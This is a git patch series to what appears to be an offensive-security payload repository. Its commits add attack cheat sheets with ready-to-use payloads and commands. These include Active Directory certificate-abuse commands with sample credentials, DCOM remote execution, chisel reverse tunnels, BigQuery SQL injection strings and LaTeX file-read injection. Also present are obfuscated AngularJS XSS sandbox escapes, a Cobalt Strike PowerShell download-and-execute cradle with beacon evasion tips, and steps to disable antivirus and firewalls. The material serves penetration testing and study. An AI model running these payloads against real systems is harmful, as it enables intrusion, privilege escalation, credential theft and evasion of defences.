[-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...] dcomexec.py -share C$ -object MMC20 '/:@' dcomexec.py -share C$ -object MMC20 '/:@' 'ipconfig' + + python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe' + # -object MMC20 specifies that we wish to instantiate the MMC20.Application object. + # -silentcommand executes the command without attempting to retrieve the output. ``` * CheeseTools - https://github.com/klezVirus/CheeseTools ```powershell @@ -3493,4 +3518,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) * [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) -* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) \ No newline at end of file +* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) +* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) diff --git a/Methodology and Resources/Miscellaneous - Tricks.md b/Methodology and Resources/Miscellaneous - Tricks.md index 1794178..e82618b 100644 --- a/Methodology and Resources/Miscellaneous - Tricks.md +++ b/Methodology and Resources/Miscellaneous - Tricks.md @@ -14,4 +14,14 @@ $ wall "Stop messing with the XXX service !" $ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root $ who $ write root pts/2 # press Ctrl+D after typing the message. +``` + +## CrackMapExec Credential Database + +```ps1 +cmedb (default) > workspace create test +cmedb (test) > workspace default +cmedb (test) > proto smb +cmedb (test)(smb) > creds +cmedb (test)(smb) > export creds csv /tmp/creds ``` \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 68a6197..39e40aa 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -8,7 +8,7 @@ * [Local Port Forwarding](#local-port-forwarding) * [Remote Port Forwarding](#remote-port-forwarding) * [Proxychains](#proxychains) -* [Graphtcp](#graphtcp) +* [Graftcp](#graftcp) * [Web SOCKS - reGeorg](#web-socks---regeorg) * [Web SOCKS - pivotnacci](#web-socks---pivotnacci) * [Metasploit](#metasploit) @@ -232,8 +232,11 @@ $ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" go get -v github.com/jpillora/chisel # forward port 389 and 88 to hacker computer -user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 user@hacker$ /opt/chisel/chisel server -p 8008 --reverse +user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 + +# SOCKS +user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks ``` ### SharpChisel diff --git a/SQL Injection/BigQuery Injection.md b/SQL Injection/BigQuery Injection.md new file mode 100644 index 0000000..ed84975 --- /dev/null +++ b/SQL Injection/BigQuery Injection.md @@ -0,0 +1,70 @@ +# Google BigQuery SQL Injection + +## Summary + +* [Detection](#detection) +* [BigQuery Comment](#bigquery-comment) +* [BigQuery Union Based](#bigquery-union-based) +* [BigQuery Error Based](#bigquery-error-based) +* [BigQuery Boolean Based](#bigquery-boolean-based) +* [BigQuery Time Based](#bigquery-time-based) +* [References](#references) + +## Detection + +* Use a classic single quote to trigger an error: `'` +* Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...``` + +```ps1 +# Gathering project id +select @@project_id + +# Gathering all dataset names +select schema_name from INFORMATION_SCHEMA.SCHEMATA + +# Gathering data from specific project id & dataset +select * from `project_id.dataset_name.table_name` +``` + +## BigQuery Comment + +```ps1 +select 1#from here it is not working +select 1/*between those it is not working*/ +``` + +## BigQuery Union Based + +```ps1 +UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name# +true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name# +true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name# +' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name# +``` + +## BigQuery Error Based + +```ps1 +# Error based - division by zero +' OR if(1/(length((select('a')))-1)=1,true,false) OR ' + +# Error based - casting: select CAST(@@project_id AS INT64) +dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC# +``` + +## BigQuery Boolean Based + +```ps1 +' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'# +``` + +## BigQuery Time Based + +* Time based functions does not exist in the BigQuery syntax. + +## References + +* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - Feb 14](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac) +* [BigQuery Documentation - Query Syntax](https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax) +* [BigQuery Documentation - Functions and Operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators) +* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - By Duc Nguyen The, March 31, 2020](https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/) \ No newline at end of file From 3e3562e55332151baa8497c5bd6b7222ac9a0913 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 20 Feb 2022 13:15:28 +0100 Subject: [PATCH 33/50] ESC3 - Misconfigured Enrollment Agent Templates + Certipy v2 --- .../Active Directory Attack.md | 107 ++++++++++++------ 1 file changed, 71 insertions(+), 36 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 60637d8..4b118b5 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -75,9 +75,10 @@ - [Active Directory Certificate Services](#active-directory-certificate-services) - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates) - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates) + - [ESC3 - Misconfigured Enrollment Agent Templates](#esc3---misconfigured-enrollment-agent-templates) - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities) - * [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2) - * [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control) + - [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2) + - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control) - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) @@ -210,41 +211,43 @@ Use the correct collector * AzureHound for Azure Active Directory * SharpHound for local Active Directory -use [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350) +* use [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350) + ```powershell + # require: Install-Module -name Az -AllowClobber + # require: Install-Module -name AzureADPreview -AllowClobber + Connect-AzureAD + Connect-AzAccount + . .\AzureHound.ps1 + Invoke-AzureHound + ``` -```powershell -# require: Install-Module -name Az -AllowClobber -# require: Install-Module -name AzureADPreview -AllowClobber -Connect-AzureAD -Connect-AzAccount -. .\AzureHound.ps1 -Invoke-AzureHound -``` +* use [BloodHound](https://github.com/BloodHoundAD/BloodHound) + ```powershell + # run the collector on the machine using SharpHound.exe + # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe + # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe + .\SharpHound.exe -c all -d active.htb -SearchForest + .\SharpHound.exe --EncryptZip --ZipFilename export.zip + .\SharpHound.exe -c all,GPOLocalGroup + .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder + .\SharpHound.exe -c all -d active.htb --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 -use [BloodHound](https://github.com/BloodHoundAD/BloodHound) + # or run the collector on the machine using Powershell + # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 + # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 + Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public + Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory -```powershell -# run the collector on the machine using SharpHound.exe -# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe -# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe -.\SharpHound.exe -c all -d active.htb -SearchForest -.\SharpHound.exe --EncryptZip --ZipFilename export.zip -.\SharpHound.exe -c all,GPOLocalGroup -.\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder -.\SharpHound.exe -c all -d active.htb --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 -.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 - -# or run the collector on the machine using Powershell -# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 -# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 -Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public -Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory - -# or remotely via BloodHound Python -# https://github.com/fox-it/BloodHound.py -pip install bloodhound -bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all -``` + # or remotely via BloodHound Python + # https://github.com/fox-it/BloodHound.py + pip install bloodhound + bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all + ``` +* Collect more data for certificates exploitation using Certipy + ```ps1 + certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound + ``` Then import the zip/json files into the Neo4J database and query them. @@ -264,6 +267,7 @@ You can add some custom queries like : * [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) * [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json) * [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json) +* [Certipy BloodHound Custom Queries from ly4k](https://github.com/ly4k/Certipy/blob/main/customqueries.json) Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. @@ -2213,11 +2217,12 @@ Exploitation: or PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local' ``` -* Use Certify or [Certi](https://github.com/eloypgz/certi) to request a Certificate and add an alternative name (user to impersonate) +* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate) ```ps1 # request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt. Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN + certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local' ``` * Use OpenSSL and convert the certificate, do not enter a password ```ps1 @@ -2246,6 +2251,21 @@ Exploitation: * Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates). +#### ESC3 - Misconfigured Enrollment Agent Templates + +> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users + +* Request a certificate based on the vulnerable certificate template ESC3. + ```ps1 + $ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3' + [*] Saved certificate and private key to 'john.pfx' + ``` +* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user + ```ps1 + $ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx' + ``` + + #### ESC4 - Access Control Vulnerabilities > Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability @@ -2266,6 +2286,17 @@ Exploitation: python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag ``` +Using Certipy + +```ps1 +# overwrite the configuration to make it vulnerable to ESC1 +certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old +# request a certificate based on the ESC4 template, just like ESC1. +certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC4' -alt 'administrator@corp.local' +# restore the old configuration +certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json +``` + #### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 > If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name. @@ -2287,7 +2318,7 @@ Mitigation: #### ESC7 - Vulnerable Certificate Authority Access Control Exploitation: -* Detect CAs that allow low privileged users the ManageCA permission +* Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions ```ps1 Certify.exe find /vulnerable ``` @@ -2387,6 +2418,10 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . output - Output path to store base64 generated crt. ``` +* Version 4: Certipy ESC8 + ```ps1 + certipy relay -ca 172.16.19.100 + ``` ### Dangerous Built-in Groups Usage From b8387bc3a59c1f19c7d2e0df9bcf78ac11bd2f32 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Radoslav=20Bod=C3=B3?= Date: Tue, 22 Feb 2022 15:57:04 +0100 Subject: [PATCH 34/50] LaTeX Injection catcode add `\catcode` to disable LaTex control characters --- LaTeX Injection/README.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/LaTeX Injection/README.md b/LaTeX Injection/README.md index 6c9d9cb..dbf0bc2 100644 --- a/LaTeX Injection/README.md +++ b/LaTeX Injection/README.md @@ -38,6 +38,18 @@ Read text file, **without** interpreting the content, it will only paste raw fil \verbatiminput{/etc/passwd} ``` +If injection point is past document header (`\usepackage` cannot be used), some control +characters can be deactivated in order to use `\input` on file containing `$`, `#`, +`_`, `&`, null bytes, ... (eg. perl scripts). + +```tex +\catcode `\$=12 +\catcode `\#=12 +\catcode `\_=12 +\catcode `\&=12 +\input{path_to_script.pl} +``` + ## Write file Write single lined file: From 5d898e004f07fbdb1a8b4aeaf3f0263d5e0116f8 Mon Sep 17 00:00:00 2001 From: ktq-cyber Date: Wed, 23 Feb 2022 22:26:16 +0700 Subject: [PATCH 35/50] [update] Angular XSS payload --- XSS Injection/XSS in Angular.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md index 5a2be10..629699b 100644 --- a/XSS Injection/XSS in Angular.md +++ b/XSS Injection/XSS in Angular.md @@ -157,6 +157,23 @@ AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter {{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}} ``` +AngularJS (without `'` single and `"` double quotes and `constructor` string) + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` ### Blind XSS From 521975a05c4abb2066a03e8aaa6065b13fbc00ae Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 1 Mar 2022 23:01:25 +0100 Subject: [PATCH 36/50] AV Removal + Cobalt SleepKit --- .../Active Directory Attack.md | 1 + .../Cobalt Strike - Cheatsheet.md | 129 +++++++----------- .../Windows - Persistence.md | 17 ++- 3 files changed, 66 insertions(+), 81 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 4b118b5..ef83864 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -232,6 +232,7 @@ Use the correct collector .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder .\SharpHound.exe -c all -d active.htb --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 + .\SharpHound.exe -c all,GPOLocalGroup --searchforest # or run the collector on the machine using Powershell # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md index c0f374e..9ddee11 100644 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md +++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md @@ -18,7 +18,8 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri * [Infrastructure](#infrastructure) * [Redirectors](#redirectors) * [Domain fronting](#domain-fronting) - * [OpSec](#opsec) +* [OpSec](#opsec) + * [Customer ID](#customer-id) * [Payloads](#payloads) * [DNS Beacon](#dns-beacon) * [SMB Beacon](#smb-beacon) @@ -37,6 +38,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri * [Resource Kit](#resource-kit) * [Artifact Kit](#artifact-kit) * [Mimikatz Kit](#mimikatz-kit) +* [Beacon Object Files](#beacon-object-files) * [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike) * [References](#references) @@ -53,14 +55,14 @@ socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80 ### Domain Fronting * New Listener > HTTP Host Header -* Target Finance & Healthcare domains +* Choose a domain in "Finance & Healthcare" sector -### OpSec +## OpSec **Don't** -* Change default self-signed HTTPS certificate -* Change default port (50050) -* 0.0.0.0 DNS response +* Use default self-signed HTTPS certificate +* Use default port (50050) +* Use 0.0.0.0 DNS response * Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D` **Do** @@ -69,9 +71,17 @@ socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80 * Firewall 50050 and access via SSH tunnel * Edit default HTTP 404 page and Content type: text/plain * No staging `set hosts_stage` to `false` in Malleable C2 +* Use Malleable Profile to taylor your attack to specific actors +### Customer ID -## Payload +> The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike. + +* The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later. +* The trial has a Customer ID value of 0. +* Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool + +## Payloads ### DNS Beacon @@ -167,11 +177,14 @@ $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\d ## Malleable C2 +List of Malleable Profiles hosted on Github * Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles * Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2 * Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles * SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint +Example of syntax + ```powershell set useragent "SOME AGENT"; # GOOD set useragent 'SOME AGENT'; # BAD @@ -186,75 +199,10 @@ prepend "!@#$%^&*()"; ``` Check a profile with `./c2lint`. - -```powershell -# -# Etumbot Profile -# http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/ -# -# Author: @harmj0y -# -set sample_name "Etumbot"; -set sleeptime "5000"; -set jitter "0"; -set maxdns "255"; -set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)"; - -http-get { - set uri "/image/"; - client { - header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8"; - header "Referer" "http://www.google.com"; - header "Pragma" "no-cache"; - header "Cache-Control" "no-cache"; - metadata { - netbios; - append "-.jpg"; - uri-append; - } - } - - server { - header "Content-Type" "img/jpg"; - header "Server" "Microsoft-IIS/6.0"; - header "X-Powered-By" "ASP.NET"; - output { - base64; - print; - } - } -} - -http-post { - set uri "/history/"; - client { - header "Content-Type" "application/octet-stream"; - header "Referer" "http://www.google.com"; - header "Pragma" "no-cache"; - header "Cache-Control" "no-cache"; - id { - netbiosu; - append ".asp"; - uri-append; - } - output { - base64; - print; - } - } - - server { - header "Content-Type" "img/jpg"; - header "Server" "Microsoft-IIS/6.0"; - header "X-Powered-By" "ASP.NET"; - output { - base64; - print; - } - } -} -``` - +* A result of 0 is returned if c2lint completes with no errors +* A result of 1 is returned if c2lint completes with only warnings +* A result of 2 is returned if c2lint completes with only errors +* A result of 3 is returned if c2lint completes with both errors and warning ## Files @@ -474,6 +422,32 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 : * Load the mimikatz.cna aggressor script * Use mimikatz functions as normal +### Sleep Mask Kit + +> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping. + +Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons. + + +## Beacon Object Files + +> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs + +Example: https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h + +* Compile + ```ps1 + # To compile this with Visual Studio: + cl.exe /c /GS- hello.c /Fohello.o + + # To compile this with x86 MinGW: + i686-w64-mingw32-gcc -c hello.c -o hello.o + + # To compile this with x64 MinGW: + x86_64-w64-mingw32-gcc -c hello.c -o hello.o + ``` +* Execute: `inline-execute /path/to/hello.o` + ## NTLM Relaying via Cobalt Strike ```powershell @@ -501,4 +475,5 @@ beacon> PortBender redirect 445 8445 * [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon) * [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) * [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) -* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) \ No newline at end of file +* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) +* [Cobalt Strike 4.5 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 3c5252c..5e3c9a2 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -4,8 +4,10 @@ * [Tools](#tools) * [Hide Your Binary](#hide-your-binary) -* [Disable Windows Defender](#disable-windows-defender) -* [Disable Windows Firewall](#disable-windows-firewall) +* [Disable Antivirus and Security](#disable-antivirus-and-security) + * [Antivirus Removal](#antivirus-removal) + * [Disable Windows Defender](#disable-windows-defender) + * [Disable Windows Firewall](#disable-windows-firewall) * [Simple User](#simple-user) * [Registry HKCU](#registry-hkcu) * [Startup](#startup) @@ -47,7 +49,14 @@ PS> attrib +h mimikatz.exe ``` -## Disable Windows Defender +## Disable Antivirus and Security + +### Antivirus Removal + +* [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/) +* [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html) + +### Disable Windows Defender ```powershell # Disable Defender @@ -68,7 +77,7 @@ Add-MpPreference -ExclusionPath C:\Video, C:\install reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f ``` -## Disable Windows Firewall +### Disable Windows Firewall ```powershell Netsh Advfirewall show allprofiles From 540d3ca399321618fabb417fa7d5d6aa4eb07ee5 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 5 Mar 2022 18:31:15 +0100 Subject: [PATCH 37/50] Vajra + MSSQL hashes --- .../Cloud - Azure Pentest.md | 10 +++++++++- .../MSSQL Server - Cheatsheet.md | 16 ++++++++++++++++ .../Windows - Privilege Escalation.md | 10 ++++++++++ 3 files changed, 35 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index ca9c9e0..65dc4d7 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -13,6 +13,10 @@ * [Enumeration methodology](#enumeration-methodology) * [Phishing with Evilginx2](#phishing-with-evilginx2) * [Illicit Consent Grant](#illicit-consent-grant) + * [Register Application](#register-application) + * [Configure Application](#configure-application) + * [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated) + * [Setup Vajra](#setup-vajra) * [Device Code Phish](#device-code-phish) * [Token from Managed Identity](#token-from-managed-identity) * [Azure API via Powershell](#azure-api-via-powershell) @@ -396,7 +400,7 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS * User.ReadBasic.All * User.Read -### Setup 365-Stealer +### Setup 365-Stealer (Deprecated) :warning: Default port for 365-Stealer phishing is 443 @@ -425,6 +429,10 @@ Check if users are allowed to consent to apps: `PS AzureADPreview> (GetAzureADMS - `--refresh-token XXX --client-id YYY --client-secret ZZZ`: use a refresh token - Find the Phishing URL: go to `https://:` and click on **Read More** button or in the console. +### Setup Vajra + +> Vajra is a UI-based tool with multiple techniques for attacking and enumerating in the target's Azure environment. It features an intuitive web-based user interface built with the Python Flask module for a better user experience. The primary focus of this tool is to have different attacking techniques all at one place with web UI interfaces. - https://github.com/TROUBLE-1/Vajra + **Mitigation**: Enable `Do not allow user consent` for applications in the "Consent and permissions menu". diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index 485649a..7c693f0 100644 --- a/Methodology and Resources/MSSQL Server - 